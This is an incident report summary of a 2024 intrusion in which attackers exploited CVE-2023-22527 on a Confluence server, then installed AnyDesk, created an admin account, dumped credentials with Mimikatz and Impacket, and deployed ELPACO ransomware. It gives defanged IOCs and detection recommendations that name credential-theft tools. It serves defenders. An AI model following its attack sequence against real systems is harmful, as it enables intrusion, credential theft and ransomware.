Full Report
Key Takeaways The DFIR Report Services Table of Contents: Case Summary In late June 2024, an unpatched Confluence server was compromised via CVE-2023-22527, a template injection vulnerability, first from IP … Read More
Analysis Summary
# Incident Report: Confluence Exploitation Leading to ELPACO Ransomware Deployment
## Executive Summary
An attacker exploited an unpatched template injection vulnerability (CVE-2023-22527) on an internet-facing Confluence server in late June 2024 to gain initial access. Following initial compromise, the threat actor established persistence, escalated privileges to SYSTEM, and used tools like Mimikatz to harvest credentials. The intrusion concluded approximately 62 hours post-exploitation with the deployment of ELPACO-team ransomware, a Mimic variant. System event logs were deleted, but significant data exfiltration was not observed.
## Incident Details
- Discovery Date: Not specified (Investigation published in October/December 2024)
- Incident Date: Late June 2024
- Affected Organization: Undisclosed
- Sector: Undisclosed
- Geography: Undisclosed
## Timeline of Events
### Initial Access
- **Date/Time:** Late June 2024
- **Vector:** Exploitation of a public-facing Confluence Server via CVE-2023-22527 (Template Injection).
- **Details:** Initial access occurred via IP address `45.227.254[.]124` running `whoami` and exiting. Shortly after, a second IP address used the same exploit to deploy a Metasploit payload (Meterpreter) establishing a C2 channel to `91.191.209[.]46`. The initial accessing IP later established a direct AnyDesk connection.
### Lateral Movement
- **Date/Time:** Fourth day of intrusion onward.
- **Details:** After privilege escalation, the threat actor used tools like Impacket Secretsdump, suggesting reconnaissance utilizing native Windows protocols for lateral movement, although specific movement techniques were not detailed beyond C2 activity.
### Data Exfiltration/Impact
- **Date/Time:** Approximately 62 hours after initial compromise.
- **Details:** The intrusion culminated in the deployment of ELPACO-team ransomware (Mimic variant). Some event logs were deleted. No significant data exfiltration was observed.
### Detection & Response
- **How it was discovered:** Not explicitly detailed, but the report references a DFIR investigation/CTF lab.
- **Response actions taken:** Response actions included steps to contain the ransomware, eradicate the threat, and recover systems (see Response Actions section).
## Attack Methodology
- **Initial Access:** Exploit Public-Facing Application (CVE-2023-22527 via Template Injection).
- **Persistence:** Installation of AnyDesk as a service running as SYSTEM user; creation of a local administrator account (“noname”).
- **Privilege Escalation:** Unsuccessful attempts using named pipe impersonation; successful escalation to SYSTEM using the RPCSS variant of named pipe impersonation.
- **Defense Evasion:** Deletion of event logs.
- **Credential Access:** Use of Mimikatz, ProcessHacker, and Impacket Secretsdump to harvest credentials.
- **Discovery:** Execution of Netscan (PUA - SoftPerfect Netscan); System/Network Configuration Discovery (T1016, T1018 mentioned in ATT&CK mapping).
- **Lateral Movement:** Implied use of Impacket tools.
- **Collection:** Credential harvesting.
- **Exfiltration:** No significant exfiltration observed.
- **Impact:** Data Encrypted for Impact (T1486) via ELPACO-team ransomware deployment.
## Impact Assessment
- **Financial:** Not quantified.
- **Data Breach:** Event logs were deleted. No significant external data exfiltration confirmed.
- **Operational:** Significant operational disruption via ransomware deployment (Data Encrypted for Impact).
- **Reputational:** Not disclosed.
## Indicators of Compromise
- **Network indicators (Defanged):**
- Initial Exploit IP: `45.227.254[.]124`
- C2 IP: `91.191.209[.]46`
- **File indicators:**
- PUA - SoftPerfect Netscan Execution.
- YARA signatures detected for HackTool - Impacket, Mimikatz, Metasploit Trojans, and ELPACO/Phobos Ransomware variants.
- **Behavioral indicators:**
- Suspicious Process By Web Server Process (`02070f-edeb-4d31-a010-a26c72ac5600`).
- Use of remote access software (AnyDesk) and RDP enablement.
- Execution of credential dumping tools (Mimikatz).
## Response Actions
- **Containment measures:** Implied containment required stopping ongoing malicious activity and stopping the spread of ransomware.
- **Eradication steps:** Eradication involved removing artifacts like the locally created admin account ("noname") and the persistence mechanism (AnyDesk service).
- **Recovery actions:** Recovery involved restoring systems impacted by the ELPACO-team ransomware deployment.
## Lessons Learned
- Unpatched, internet-facing services (Confluence) remain a primary and effective initial access vector.
- Threat actors utilized standardized playbooks (AnyDesk installation, admin creation, RDP enablement) suggesting automation.
- Privilege escalation via user-mode techniques progressed to highly privileged SYSTEM access via RPCSS named pipe impersonation.
- Reliance on multiple remote access tools (AnyDesk, Meterpreter, RDP) indicates an adapted approach to maintain C2 connectivity.
## Recommendations
- Implement immediate patching policies, especially for public-facing services like Confluence, prioritizing known CVEs like CVE-2023-22527.
- Implement robust monitoring and alerting on web servers that spawn unexpected child processes (e.g., C2 payloads, native tools like curl, or remote access software installation).
- Harden configurations to prevent the successful execution of common post-exploitation tools like Mimikatz and Impacket usage.
- Improve detection for advanced privilege escalation techniques, specifically monitoring for named pipe impersonation against sensitive services like RPCSS.
- Ensure comprehensive logging is maintained and alerts are triggered upon log deletion events.